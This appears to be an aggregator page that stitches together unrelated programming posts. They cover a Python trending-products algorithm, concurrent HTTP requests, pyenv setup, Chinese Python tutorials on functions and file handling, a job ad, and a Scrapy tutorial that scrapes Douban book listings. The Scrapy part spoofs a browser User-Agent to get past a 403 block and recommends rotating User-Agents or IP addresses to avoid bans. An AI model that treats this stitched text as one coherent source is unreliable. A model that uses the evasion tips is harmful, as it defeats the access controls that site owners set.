After an awesome brainstorming session with one of our investors, Paul Martino from Bullpen Capital , we came up with the idea of a trending products algorithm. We'll take all of the add-to-cart actions every day, and find products that are trending upwards. Sometimes, of course, this will just reflect the activities of our marketing department (promoting a product in an email, for instance, would cause it to trend), but with proper standardization it should also highlight newness, trending search terms, and other serendipitous reasons a product might be of interest. It's also easier for slower-moving products to make sudden gains in popularity so should get some of those long-tail products to the surface.

Implementing a Trending Products Engine

First, let's get our add-to-cart data. From our database, this is relatively simple; we track the creation time of every cart-product (we call it a 'shipment item') so we can just extract this using SQL. I've taken the last 20 days of cart data so we can see some trends (though really only a few days of data is needed to determine what's trending):

SELECT v.product_id , -(CURRENT_DATE - si.created_at::date) "age" , COUNT(si.id) FROM product_variant v INNER JOIN schedule_shipmentitem si ON si.variant_id = v.id WHERE si.created_at >= (now() - INTERVAL '20 DAYS') AND si.created_at < CURRENT_DATE GROUP BY 1, 2

I've simplified the above a bit (the production version has some subtleties around active products, paid customers, the circumstances in which the product was added, etc), but the shape of the resulting data is dead simple:

id age count 14 -20 22 14 -19 158 14 -18 94 14 -17 52 14 -16 56 14 -15 56 14 -14 52 14 -13 100 14 -12 109 14 -11 151 14 -10 124 14 -9 123 14 -8 58 14 -7 64 14 -6 114 14 -5 93 14 -4 112 14 -3 87 14 -2 81 14 -1 19 15 -20 16 ... 15 -1 30 16 -20 403 ... 16 -1 842

Each row represents the number of cart adds for a particular product on a particular day in the past 20 days. I use 'age' as -20 (20 days ago) to -1 (yesterday) so that, when visualizing the data, it reads left-to-right, past-to-present, intuitively.

Here's sample data for 100 random products from our database. I'm anonymized both the product IDs and the cart-adds in such a way that, when standardized, the results are completely real, but the individual data points don't represent our actual business.

Basic Approach

Before we dive into the code, let's outline the basic approach by visualizing the data. All the code for each intermediate step, and the visualizations, is included and explained later.

Here's the add-to-carts for product 542, from the sample dataset:


A Simple Trending Products Recommendation Engine in Python

The first thing we'll do is add a low-pass filter (a smoothing function) so daily fluctuations are attentuated.


A Simple Trending Products Recommendation Engine in Python

Then we'll standardize the Y-axis, so popular products are comparable with less popular products. Note the change in the Y-axis values.


A Simple Trending Products Recommendation Engine in Python

Last, we'll calculate the slopes of each line segment of the smoothed trend.


A Simple Trending Products Recommendation Engine in Python

Our algorithm will perform these steps (in memory, of course, not visually) for each product in the dataset and then simply return the products with the greatest slope values in the past day, e.g. the max values of the red line at t=-1.

The Code

Let's get into it! You can run all of the code in this post via a python 2 Jupyter notebook.

Here's the code to produce the first chart (simply visualizing the trend). Just like we built up the charts, we'll build from this code to create the final algorithm.

import matplotlib.pyplot as plt import pandas as pd import numpy as np # Read the data into a Pandas dataframe df = pd.read_csv('sample-cart-add-data.csv') # Group by ID & Age cart_adds = pd.pivot_table(df, values='count', index=['id', 'age']) ID = 542 trend = np.array(cart_adds[ID]) x = np.arange(-len(trend),0) plt.plot(x, trend, label="Cart Adds") plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) plt.title(str(ID)) plt.show()

It doesn't get much simpler. I use the pandas pivot_table function to create an index of both product IDs and the 'age' dimension, which just makes it easy to select the data I want later.

Smoothing

Let's write the smoothing function and add it to the chart:

def smooth(series, window_size, window): # Generate data points 'outside' of x on either side to ensure # the smoothing window can operate everywhere ext = np.r_[2 * series[0] - series[window_size-1::-1], series, 2 * series[-1] - series[-1:-window_size:-1]] weights = window(window_size) weights[0:window_size/2] = np.zeros(window_size/2) smoothed = np.convolve(weights / weights.sum(), ext, mode='same') return smoothed[window_size:-window_size+1] # trim away the excess data smoothed = smooth( trend, 7, np.hamming ) plt.plot(x, smoothed, label="Smoothed")

This function merits an explanation. First, it's taken more-or-less from the SciPy Cookbook , but modified to be...less weird.

The smooth function takes a 'window' of weights, defined in this case by the Hamming Window , and 'moves' it across the original data, weighting adjacent data points according to the window weights.

Numpy provides a bunch of windows (Hamming, Hanning, Blackman, etc.) and you can get a feel for them at the command line:

>>> print np.hamming(7) [ 0.08 0.31 0.77 1. 0.77 0.31 0.08]

That 'window' will be moved over the data set ('convolved') to create a new, smoothed set of data. This is just a very simple low-pass filter.

Lines 5-7 invert and mirror the first few and last few data points in the original series so that the window can still 'fit', even at the edge data points. This might seem a little odd, since at the end of the day we are only going to care about the final data point to determine our trending products. You might think we'd prefer to use a smoothing function that only examines historical data. But because the interpolation just mirrors the trailing data as it approaches the forward edge, there's ultimately no net effect on the result.

Standardization

We need to compare products that average, for instnace, 10 cart-adds per day to products that average hundreds or thousands. To solve this problem, we standardize the data by dividing by the Interquartile Range (IQR):

def standardize(series): iqr = np.percentile(series, 75) - np.percentile(series, 25) return (series - np.median(series)) / iqr smoothed_std = standardize(smoothed) plt.plot(x, smoothed_std)

I also subtract the median so that the series more-or-less centers around 0, rather than 1. Note that this is standardization not normalization , the difference being that normalization strictly bounds the value in the series between a known range (typically 0 and 1), whereas standardization just puts everything onto the same scale.

There are plenty of ways of standardizing data; this one is plenty robust and easy to implement.

Slopes

Really simple! To find the slope of the smoothed, standardized series at every point, just take a copy of the series, offset it by 1, and subtract. Visually, for some example data:


A Simple Trending Products Recommendation Engine in Python

And in code:

slopes = smoothed_std[1:]-smoothed_std[:-1]) plt.plot(x, slopes)

Boom! That was easy.

Putting it all together

Now we just need to repeat all of that, for every product, and find the products with the max slope value at the most recent time step.

The final implementation is below:

import pandas as pd import numpy as np import operator SMOOTHING_WINDOW_FUNCTION = np.hamming SMOOTHING_WINDOW_SIZE = 7 def train(): df = pd.read_csv('sample-cart-add-data.csv') df.sort_values(by=['id', 'age'], inplace=True) trends = pd.pivot_table(df, values='count', index=['id', 'age']) trend_snap = {} for i in np.unique(df['id']): trend = np.array(trends[i]) smoothed = smooth(trend, SMOOTHING_WINDOW_SIZE, SMOOTHING_WINDOW_FUNCTION) nsmoothed = standardize(smoothed) slopes = nsmoothed[1:] - nsmoothed[:-1] # I blend in the previous slope as well, to stabalize things a bit and # give a boost to things that have been trending for more than 1 day if len(slopes) > 1: trend_snap[i] = slopes[-1] + slopes[-2] * 0.5 return sorted(trend_snap.items(), key=operator.itemgetter(1), reverse=True) def smooth(series, window_size, window): ext = np.r_[2 * series[0] - series[window_size-1::-1], series, 2 * series[-1] - series[-1:-window_size:-1]] weights = window(window_size) smoothed = np.convolve(weights / weights.sum(), ext, mode='same') return smoothed[window_size:-window_size+1] def standardize(series): iqr = np.percentile(series, 75) - np.percentile(series, 25) return (series - np.median(series)) / iqr trending = train() print "Top 5 trending products:" for i, s in trending[:5]: print "Product %s (score: %2.2f)" % (i, s)

And the result:

Top 5 trending products: Product 103 (score: 1.31) Product 573 (score: 1.25) Product 442 (score: 1.01) Product 753 (score: 0.78) Product 738 (score: 0.66)

That's the core of the algorithm. It's now in production, performing well against our existing algorithms. We have a few additional pieces we're putting in place to goose the performance further:

Throwing away any results from wildly unpopular products. Otherwise, products that fluctuate around 1-5 cart-adds per day too easily appear in the results just by jumping to 10+ adds for one day.

Weighting products so that a product that jumps from an average of 500 adds/day to 600 adds/day has a chance to trend alongside a product that jumped from 20 to 40.

There is weirdly little material out there about trending algorithms - and it's entirely possible (likely, even) that others have more sophisticated techniques that yield better results.

But for Grove, this hits all the marks: explicable, serendipitous, and gets more clicks than anything other product feed we've put in front of our customers.

Like what you read? Join the newsletter and get updated when there's something new.

Concurrent Requests with Python3

$
0
0
Intro

Pulling data from websites is often the first step of a data-analytic process.

The number of data resources required for an analysis influences the time this process take. Few resources, of course, require little time to gather. But gathering data from 1000 resources (i.e. making 1000 API calls) could take a substantial amount of time. If the resources must gathered on a repeating basis, the problem is compounded.

People new to python might be uncertain as to how to make this process faster; here’s a demonstration and comparison of some approaches!

We start with a list of resources:

subs = [ 'politics', 'canada', 'funny', 'news', 'gifs', 'python', 'worldnews', 'aww', 'movies', 'books', 'space', 'creepy', ] endpoints = ['https://reddit.com/r/%s/top.json?t=day&limit=10' % s for s in subs] Blocking

With the requests library, we can put the data from each resource into a list shown below.

Note, the resources are downloaded sequentially. The total time is approximately:

time_per_resource * number_of_resources .

import requests %%timeit done_blocking = [requests.get(u) for u in endpoints] 1 loop, best of 3: 8.46 s per loop Parallel

Parallel methods split the acquisition of resources across workers. Workers can be threads or processes and are accessed through the Executor class from the concurrent.futures module. Users can overlook some of these details. requests_futures provides a API the same as the requests with a parallel underlying implementation.

Each worker handles tasks sequentially. *If the number of worker (threads or processes) is close to the number of tasks, the process requires a fixed time for any number of tasks; specifically it requires approximately the time for the longest task*:

from requests_futures.sessions import FuturesSession from concurrent.futures import wait session = FuturesSession(max_workers=len(endpoints)) %%timeit futures = [ session.get(u) for u in endpoints ] done, incomplete = wait(futures) 1 loop, best of 3: 189 ms per loop

*More generally, the process requires the time to process the number of tasks / number of workers in sequence *:

session = FuturesSession(max_workers=2) %%timeit futures = [ session.get(u) for u in endpoints ] done, incomplete = wait(futures) 1 loop, best of 3: 1.1 s per loop Asyncio

A third method is asynchronous. In this case, nothing is guaranteed to happen in sequence. Tasks must have entry/exit points where the worker (i.e. the main thread) can leave them and work on something else. In this case, the web request constitutes that entry point; so, for example, once the first web request is started, the main thread works on something else, i.e. starting the next web request.

I have a hard time coming up with an expression for the duration of the asynchronous case. I suppose its something like:

time_not_waiting + max(time_for_task_i - time_task_i_started)

import asyncio import aiohttp import json loop = asyncio.get_event_loop() client = aiohttp.ClientSession(loop=loop) async def get_json(client, url): async with client.get(url) as response: return await response.read() %%timeit result = loop.run_until_complete( asyncio.gather( *[get_json(client, e) for e in endpoints] ) ) 1 loop, best of 3: 741 ms per loop When to use which?

There’s a few ways to look at this. The key for me is that, in terms of simplicity, sequential > parallel > asynchronous. That’s my apriori preference.

For a few tasks, use sequential.

With a large number of tasks that are not meaningful entered/exited (i.e. they are not waiting for input/output), parallel. A good example here is running an operation on rows of a data set which is already in memory.

With a large number of tasks which are usually waiting for intput/output, use asynchronous. For web requests, asynchronous fits the bill for the large number of tasks.

Large depends on how long a task tasks and your time sensitivity.

Bonus

Asynchronous parallel would be fascinating and useful for a very large number of i/o heavy tasks; if you have any idea how to achieve this do share!

Python开发能力强大 把握先机领航编程风向

$
0
0
python开发能力强大 把握先机领航编程风向

一点号奇酷学院1小时前

谈起Python也许很多人还不是很了解,其实它是一款编程语言,它常常被程序员所使用,因此程序员会比较熟。但是对于刚接触它的人来说肯定想了解一下Python是什么?Python有哪些功能?为此奇酷学院整理了以下教程!

Python是什么?

Python是著名的“龟叔”Guido van Rossum在1989年圣诞节期间,为了打发无聊的圣诞节而编写的一个编程语言。

现在,全世界差不多有600多种编程语言,但流行的编程语言也就那么20来种。如果你听说过TIOBE排行榜,你就能知道编程语言的大致流行程度。这是最近10年最常用的10种编程语言的变化图:
php?url=0FZzYEH0Vb" alt="Python开发能力强大 把握先机领航编程风向" />
Python的功能:

总的来说,这几种编程语言各有千秋。C语言是可以用来编写操作系统的贴近硬件的语言,所以,C语言适合开发那些追求运行速度、充分发挥硬件性能的程序。而Python是用来编写应用程序的高级编程语言。

当你用一种语言开始作真正的软件开发时,你除了编写代码外,还需要很多基本的已经写好的现成的东西,来帮助你加快开发进度。比如说,要编写一个电子邮件客户端,如果先从最底层开始编写网络协议相关的代码,那估计一年半载也开发不出来。高级编程语言通常都会提供一个比较完善的基础代码库,让你能直接调用,比如,针对电子邮件协议的SMTP库,针对桌面环境的GUI库,在这些已有的代码库的基础上开发,一个电子邮件客户端几天就能开发出来。

Python就为我们提供了非常完善的基础代码库,覆盖了网络、文件、GUI、数据库、文本等大量内容,被形象地称作“内置电池(Batteries included)”。用Python开发,许多功能不必从零编写,直接使用现成的即可。

除了内置的库外,Python还有大量的第三方库,也就是别人开发的,供你直接使用的东西。当然,如果你开发的代码通过很好的封装,也可以作为第三方库给别人使用。

许多大型网站就是用Python开发的,例如YouTube、Instagram,还有国内的豆瓣。很多大公司,包括Google、Yahoo等,甚至NASA(美国航空航天局)都大量地使用Python。

开发者给Python的定位是“优雅”、“明确”、“简单”,所以Python程序看上去总是简单易懂,初学者学Python,不但入门容易,而且将来深入下去,可以编写那些非常非常复杂的程序。

总的来说,Python的哲学就是简单优雅,尽量写容易看明白的代码,尽量写少的代码。如果一个资深程序员向你炫耀他写的晦涩难懂、动不动就几万行的代码,你可以尽情地嘲笑他。


Python开发能力强大  把握先机领航编程风向
Python适合开发哪些类型的应用呢?首选是网络应用,包括网站、后台服务等等;其次是许多日常需要的小工具,包括系统管理员需要的脚本任务等等;另外就是把其他语言开发的程序再包装起来,方便使用。

奇酷学院Python课程专门为零基础和有一点编程经验的朋友定制的,在老师指导下,按照课程学习,一个月就可以入门,一般4个月时间就可以系统掌握Python,并且自己动手编写程序,解决问题。如果你觉得这门语言适合你,就赶紧学起来吧!

Python多版本共存管理工具之pyenv

$
0
0
Table of Contents [TOC]

经常遇到这样的情况:

系统自带的python是2.6,自己需要Python 2.7中的某些特性; 系统自带的Python是2.x,自己需要Python 3.x; 此时需要在系统中安装多个Python,但又不能影响系统自带的Python,即需要实现Python的多版本共存。 pyenv 就是这样一个Python版本管理器。 1. 安装pyenv $ git clone git://github.com/yyuu/pyenv.git ~/.pyenv $ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc $ echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc $ echo 'eval "$(pyenv init -)"' >> ~/.bashrc $ exec $SHELL -l 2. 安装Python

查看可安装的版本

$ pyenv install --list

该命令会列出可以用pyenv安装的Python版本,仅列举几个:

2.7.8 # Python 2最新版本

3.4.1 # Python 3最新版本

anaconda-2.0.1 # 支持Python 2.6和2.7

anaconda3-2.0.1 # 支持Python 3.3和3.4

其中形如x.x.x这样的只有版本号的为Python官方版本,其他的形如xxxxx-x.x.x这种既有名称又有版本后的属于“衍生版”或发行版。

2.1 安装Python的依赖包

在安装Python时需要首先安装其依赖的其他软件包,已知的一些需要预先安装的库如下。

在CentOS/RHEL/Fedora下:

sudo yum install readline readline-devel readline-static sudo yum install openssl openssl-devel openssl-static sudo yum install sqlite-devel sudo yum install bzip2-devel bzip2-libs 2.2 安装指定版本

使用如下命令即可安装python 3.4.1:

$ pyenv install 3.4.1 -v

该命令会从github上下载python的源代码,并解压到/tmp目录下,然后在/tmp中执行编译工作。若依赖包没有安装,则会出现编译错误,需要在安装依赖包后重新执行该命令。

对于科研环境,更推荐安装专为科学计算准备的Anaconda发行版,pyenv install anaconda-2.1.0安装2.x版本,pyenv install anaconda3-2.1.0安装3.x版本;

Anacoda很大,用pyenv下载会比较慢,可以自己到Anaconda官方网站下载,并将下载得到的文件放在 ~/.pyenv/cache 目录下,则pyenv不会重复下载。

2.3 更新数据库

安装完成之后需要对数据库进行更新:

$ pyenv rehash

查看当前已安装的python版本

$ pyenv versions * system (set by /home/seisman/.pyenv/version) 3.4.1

其中的星号表示当前正在使用的是系统自带的python。

2.4 设置全局的python版本 $ pyenv global 3.4.1 $ pyenv versions system * 3.4.1 (set by /home/seisman/.pyenv/version)

当前全局的python版本已经变成了3.4.1。也可以使用pyenv local或pyenv shell临时改变python版本。

2.5 确认python版本 $ python Python 3.4.1 (default, Sep 10 2014, 17:10:18) [GCC 4.4.7 20120313 (Red Hat 4.4.7-1)] on linux Type "help", "copyright", "credits" or "license" for more information. >>> 3.0 使用python

输入python即可使用新版本的python;

系统自带的脚本会以/usr/bin/python的方式直接调用老版本的python,因而不会对系统脚本产生影响;

使用pip安装第三方模块时会安装到~/.pyenv/versions/3.4.1下,不会和系统模块发生冲突。

使用pip安装模块后,可能需要执行pyenv rehash更新数据库;

参考

https://github.com/yyuu/pyenv

http://blog.csdn.net/chris__kk/article/details/45127973

0015 编程入门python之定义函数

$
0
0
0015 编程入门python之定义函数

一点号零基础学编程2小时前


php?url=0Fa0MhxnBp" alt="0015 编程入门python之定义函数" />

今天讲python函数。

输入参数求三角形或圆形或长方形的面积

先输入1个参数:形状类型 1=三角形 2=圆形 3=长方形

然后根据输入的形状类型,要求输入计算面积所需的其它参数:

例如:三角形,输入底和高;圆形,输入半径;长方形,输入长和宽

然后计算出形状面积。

代码如下:


0015 编程入门python之定义函数

结果如下:


0015 编程入门python之定义函数

思考一下,这里的计算某种特定形状的面积,这个功能是否能够复用呢,也就是被其它程序使用呢

3个形状的计算面积功能,如果像上面这样写在一个程序里面是没有办法被其它程序复用的

函数的概念

函数是组织好的,可重复使用的,用来实现单一,或相关联功能的代码段。

函数能提高应用的模块性,和代码的重复利用率。你已经知道Python提供了许多内建函数,比如print。但你也可以自己创建函数,这被叫做用户自定义函数。

语法:

def functionname( parameters ):

"函数_文档字符串"

function_suite

return [expression]

举例如下:

def printme(str):

print str

return

def add(num1,num2):

ret=num1+num2

return ret

总结一下特征:

函数代码块以 def 关键词开头,后接函数标识符名称和圆括号。

任何传入参数和自变量必须放在圆括号中间。圆括号之间可以用于定义参数。

函数的第一行语句可以选择性地使用文档字符串―用于存放函数说明。

函数内容以冒号起始,并且缩进。

return [表达式] 结束函数,选择性地返回一个值给调用方。不带表达式的return相当于返回 None。或者不写return语句。 函数的调用

定义好函数之后,就可以调用这个函数,我们之前已经调用过很多函数了,例如print , input 等等

例如调用自定义加法函数:

def add(num1,num2)

ret=num1+num2

return ret

print add(5,3)

print add(8,6)

按值传递参数和按引用传递参数

所有参数(自变量)在Python里都是按引用传递。如果你在函数里修改了参数,那么在调用这个函数的函数里,原始的参数也被改变了。

例如:

def changelist( thelist ):

thelist.append(["a","b","c"]);

print "函数内变量值: ", thelist

return

mylist = [1,2,3];

changelist( mylist );

print "函数外变量值: ", mylist

传入函数的和在末尾添加新内容的对象用的是同一个引用。故输出结果如下:

函数内变量值: [1,2,3,["a","b","c"]] 函数外变量值: [1,2,3,["a","b","c"]]

在python环境里面实验看看:


0015 编程入门python之定义函数
参数的几种形式

必备参数

必备参数须以正确的顺序传入函数。调用时的数量必须和声明时的一样。

调用printme函数,你必须传入一个参数,不然会出现语法错误:

在python环境里面实验看看:


0015 编程入门python之定义函数

关键字参数

关键字参数和函数调用关系紧密,函数调用使用关键字参数来确定传入的参数值。

使用关键字参数允许函数调用时参数的顺序与声明时不一致,因为 Python 解释器能够用参数名匹配参数值。

在python环境里面实验看看:


0015 编程入门python之定义函数

缺省参数

调用函数时,缺省参数的值如果没有传入,则被认为是默认值。下例会打印默认的age,如果age没有被传入:

在python环境里面实验看看:


0015 编程入门python之定义函数
改造之前的四则计算器程序

将之前做过的四则计算器程序拿出来,将里面的加减乘除计算作成4个函数调用:

代码如下:


0015 编程入门python之定义函数
改造上面的面积计算程序

这节课开始的面积计算程序,可以分别讲3个形状的面积计算公式作成函数,然后分别调用:

完整代码如下:


0015 编程入门python之定义函数

函数最重要的作用是可以将代码重新组织并重复利用,减少代码冗余,并能够减少出错的可能性,提高代码的结构性和可读性。

函数是非常重要的概念,基于函数才能够构造出更复杂的程序,实现更复杂的功能。

课后作业

1.修改输入一个年月日日期,输出是星期几的程序,闰年判断做成函数,统计天数作成函数,星期计算做成函数

2.求图形面积函数增加平行四边形,梯形

往期教程

因为教程是系列教程,前后关联性非常强,请大家按照微信公众号【零基础学编程】的历史消息发布时间先后次序进行阅读。

QQ群简介

欢迎大家加入QQ群 603559164 零基础学编程,交流学习,共同进步。

Athelas (YC S16) is hiring mobile/back end engineers for blood diagnostics

$
0
0

Athelas works on problems at the unique confluence of computer science, biology, and machine learning. Our team's background includes research at Stanford, work in the robotics industry, published papers in Nature + Science. We're backed by some of the top VCs in the valley, and looking to add to our founding team.


Athelas (YC S16) is hiring mobile/back end engineers for blood diagnostics

Join us and work on a device that's already run thousands of blood tests and is quietly transforming the dynamics of blood count diagnostics.

Jobs

Software Engineer

Work on our backend, mobile, and data-processing stack. Create interfaces and features for users + doctors in our mobile applications and web portals. Experience in javascript, python, C. (React, Python web frameworks)

email resume and projects to: founders [at] getathelas.com

Hardware Engineer

Work on our device EE stack. Build out low-cost, resilient hardware that is deployed on field in monthly cycles. Experience with microcontrollers, software, servo-control, firmware, circuit design, electrical engineering.

email resume and projects to: founders [at] getathelas.com

Business Development (Medical)

Work on our marketing, strategy, and business development in the medical community as we roll out the Athelas device. Looking for a hire with 5+ years of experience in medical sales/bizdev.

email resume and projects to: founders [at] getathelas.com

Python全栈之路系列之文件操作

$
0
0

python可以对文件进行查看、创建等功能,可以对文件内容进行添加、修改、删除,且所使用到的函数在Python3.5.x为 open ,在Python2.7.x同时支持 file 和 open ,但是在3.5.x系列移除了 file 函数。

Python文件打开方式 文件句柄 = open('文件路径','打开模式')

Ps:文件句柄相当于于变量名,文件路径可以写为绝对路径也可以写为相对路径。

Python打开文件的模式

基本的模式

模式 说明 注意事项 r 只读模式 文件必须存在 w 只写模式 文件不存在则创建文件,文件存在则清空文件内容 x 只写模式 文件不可读,文件不存在则创建,存在则报错 a 追加模式 文件不存在创建文件,文件存在则在文件末尾添加内容

带 + 的模式

模式 说明 r+ 读写 w+ 写读 x+ 写读 a+ 写读

带 b 的模式

模式 说明 rb 二进制读模式 wb 二进制写模式 xb 二进制只写模式 ab 二进制追加模式

提示:以b方式打开时,读取到的内容是字节类型,写入时也需要提供字节类型

带 + 带 b 的模式

模式 说明 rb+ 二进制读写模式 wb+ 二进制读写模式 xb+ 二进制只写模式 ab+ 二进制读写模式 Python文件读取方式 模式 说明 read([size]) 读取文件全部内容,如果设置了size,那么久读取size字节 readline([size]) 一行一行的读取 readlines() 读取到的每一行内容作为列表中的一个元素

测试的文件名是 hello.tx" ,文件内容为:

Hello Word! 123 abc 456 abc 789 abc read

代码:

# 以只读的方式打开文件hello.txt f = open("hello.txt","r") # 读取文件内容赋值给变量c c = f.read() # 关闭文件 f.close() # 输出c的值 print(c)

输出结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py Hello Word! 123 abc 456 abc 789 abc readline

代码:

# 以只读模式打开文件hello.txt f = open("hello.txt","r") # 读取第一行 c1 = f.readline() # 读取第二行 c2 = f.readline() # 读取第三行 c3 = f.readline() # 关闭文件 f.close() # 输出读取文件第一行内容 print(c1) # 输出读取文件第二行内容 print(c2) # 输出读取文件第三行内容 print(c3)

输出结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py Hello Word! 123 abc readlines # 以只读的方式打开文件hello.txt f = open("hello.txt","r") # 将文件所有内容赋值给c c = f.readlines() # 查看数据类型 print(type(c)) # 关闭文件 f.close() # 遍历输出文件内容 for n in c: print(n)

结果

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py # 输出的数据类型 <class 'list'> Hello Word! 123 abc 456 abc 789 abc Python文件写入方式 方法 说明 write(str) 将字符串写入文件 writelines(sequence or strings) 写多行到文件,参数可以是一个可迭代的对象,列表、元组等 write

代码:

# 以只读的模式打开文件write.txt,没有则创建,有则覆盖内容 file = open("write.txt","w") # 在文件内容中写入字符串test write file.write("test write") # 关闭文件 file.close()

write.txt 文件内容为:

test write writelines

代码:

# 以只读模式打开一个不存在的文件wr_lines.txt f = open("wr_lines.txt","w",encoding="utf-8") # 写入一个列表 f.writelines(["11","22","33"]) # 关闭文件 f.close()

wr_lines.txt 文件内容:

Python文件操作所提供的方法 close(self):

关闭已经打开的文件

f.close() fileno(self):

文件描述符

f = open("hello.txt","r") ret = f.fileno() f.close() print(ret)

执行结果:

flush(self):

刷新缓冲区的内容到硬盘中

f.flush() isatty(self):

判断文件是否是tty设备,如果是tty设备则返回 True ,否则返回 False

f = open("hello.txt","r") ret = f.isatty() f.close() print(ret)

返回结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py False readable(self):

是否可读,如果可读返回 True ,否则返回 False

f = open("hello.txt","r") ret = f.readable() f.close() print(ret)

返回结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py True readline(self, limit=-1):

每次仅读取一行数据

f = open("hello.txt","r") print(f.readline()) print(f.readline()) f.close()

返回结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py Hello Word! 123 readlines(self, hint=-1):

把每一行内容当作列表中的一个元素

f = open("hello.txt","r") print(f.readlines()) f.close()

返回结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py ['Hello Word!\n', '123\n', 'abc\n', '456\n', 'abc\n', '789\n', 'abc']

tell(self):

获取指针位置

f = open("hello.txt","r") print(f.tell()) f.close()

返回结果:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py 0 seek(self, offset, whence=io.SEEK_SET):

指定文件中指针位置

f = open("hello.txt","r") print(f.tell()) f.seek(3) print(f.tell()) f.close()

执行结果

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py 0 3 seekable(self):

指针是否可操作

f = open("hello.txt","r") print(f.seekable()) f.close()

执行结果

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py True writable(self):

是否可写

f = open("hello.txt","r") print(f.writable()) f.close()

执行结果

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py False writelines(self, lines):

写入文件的字符串序列,序列可以是任何迭代的对象字符串生产,通常是一个 字符串列表 。

f = open("wr_lines.txt","w") f.writelines(["11","22","33"]) f.close()

执行结果

read(self, n=None):

读取指定字节数据,后面不加参数默认读取全部

f = open("wr_lines.txt","r") print(f.read(3)) f.seek(0) print(f.read()) f.close()

执行结果

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py 112 112233 write(self, s):

往文件里面写内容

f = open("wr_lines.txt","w") f.write("abcabcabc") f.close()

文件内容

abcabcabc 同时打开多个文件

为了避免打开文件后忘记关闭,可以通过管理上下文,即:

with open('log','r') as f: 代码块

如此方式,当with代码块执行完毕时,内部会自动关闭并释放文件资源。

在Python 2.7 及以后,with又支持同时对多个文件的上下文进行管理,即:

with open('log1') as obj1, open('log2') as obj2: pass

原文链接


Scrapy学习(三) 爬取豆瓣图书信息

$
0
0
前言

Scrapy学习(一) 安装

Scrapy学习(二) 入门

有了前两篇的基础,就可以开始互联网上爬取我们感兴趣的信息了。因为暂时还没有学到如何模拟登陆,所以我就先抓像豆瓣这样不需要登陆的网站上的内容。

我的开发环境是 Win7 + PyChram + python3.5 + MongoDB

爬虫的目标是豆瓣的日本文学标签下的所有书籍基本信息

创建项目

scrapy startproject douban

接着移动到 douban 目录下

scrapy genspider book book.douban.com

在spider目录下生成相应的BookSpider模板

编写Item

在items.py中编写我们需要的数据模型

class BookItem(scrapy.Item): book_name = scrapy.Field() book_star = scrapy.Field() book_pl = scrapy.Field() book_author = scrapy.Field() book_publish = scrapy.Field() book_date = scrapy.Field() book_price = scrapy.Field() 编写Spider 访问豆瓣的 日本文学 标签,将url的值写到 start_urls 中。接着在Chrome的帮助下,可以看到每本图书是在 ul#subject-list > li.subject-item
Scrapy学习(三) 爬取豆瓣图书信息
class BookSpider(scrapy.Spider): ... def parse(self, response): sel = Selector(response) book_list = sel.css('#subject_list > ul > li') for book in book_list: item = BookItem() item['book_name'] = book.xpath('div[@class="info"]/h2/a/text()').extract()[0].strip() item['book_star'] = book.xpath("div[@class='info']/div[2]/span[@class='rating_nums']/text()").extract()[ 0].strip() item['book_pl'] = book.xpath("div[@class='info']/div[2]/span[@class='pl']/text()").extract()[0].strip() pub = book.xpath('div[@class="info"]/div[@class="pub"]/text()').extract()[0].strip().split('/') item['book_price'] = pub.pop() item['book_date'] = pub.pop() item['book_publish'] = pub.pop() item['book_author'] = '/'.join(pub) yield item

测试一下代码是否有问题

scrapy crawl book -o items.json

奇怪的发现,items.json内并没有数据,后头看控制台中的DEBUG信息

2017-02-04 16:15:38 [scrapy.core.engine] INFO: Spider opened 2017-02-04 16:15:38 [scrapy.extensions.logstats] INFO: Crawled 0 pages (at 0 pages/min), scraped 0 items (at 0 items/min) 2017-02-04 16:15:38 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023 2017-02-04 16:15:39 [scrapy.core.engine] DEBUG: Crawled (403) <GET https://book.douban.com/robot... (referer: None) 2017-02-04 16:15:39 [scrapy.core.engine] DEBUG: Crawled (403) <GET https://book.douban.com/tag/%... (referer: None)

爬取网页时状态码是403。这是因为服务器判断出爬虫程序,拒绝我们访问。

我们可以在settings中设定 USER_AGENT 的值,伪装成浏览器访问页面。

USER_AGENT = "Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

再试一次,就发现items.json有值了。但仔细只有第一页的数据,如果我们想要爬取所有的数据,就需要爬完当前页后自动获得下一页的url,以此类推爬完所有数据。

所以我们对spider进行改造。

... def parse(self, response): sel = Selector(response) book_list = sel.css('#subject_list > ul > li') for book in book_list: item = BookItem() try: item['book_name'] = book.xpath('div[@class="info"]/h2/a/text()').extract()[0].strip() item['book_star'] = book.xpath("div[@class='info']/div[2]/span[@class='rating_nums']/text()").extract()[0].strip() item['book_pl'] = book.xpath("div[@class='info']/div[2]/span[@class='pl']/text()").extract()[0].strip() pub = book.xpath('div[@class="info"]/div[@class="pub"]/text()').extract()[0].strip().split('/') item['book_price'] = pub.pop() item['book_date'] = pub.pop() item['book_publish'] = pub.pop() item['book_author'] = '/'.join(pub) yield item except: pass nextPage = sel.xpath('//div[@id="subject_list"]/div[@class="paginator"]/span[@class="next"]/a/@href').extract()[0].strip() if nextPage: next_url = 'https://book.douban.com'+nextPage yield scrapy.http.Request(next_url,callback=self.parse)

其中 scrapy.http.Request 会回调parse函数,用try...catch是因为豆瓣图书并不是格式一致的。遇到有问题的数据,就抛弃不用。

突破反爬虫

一般来说,如果爬虫速度过快。会导致网站拒绝我们的访问,所以我们需要在settings设置爬虫的间隔时间,并关掉COOKIES

DOWNLOAD_DELAY = 2

COOKIES_ENABLED = False

或者,我们可以设置不同的浏览器UA或者IP地址来回避网站的屏蔽

下面用更改UA来作为例子。

在middlewares.py,编写一个随机替换UA的中间件,每个request都会经过middleware。

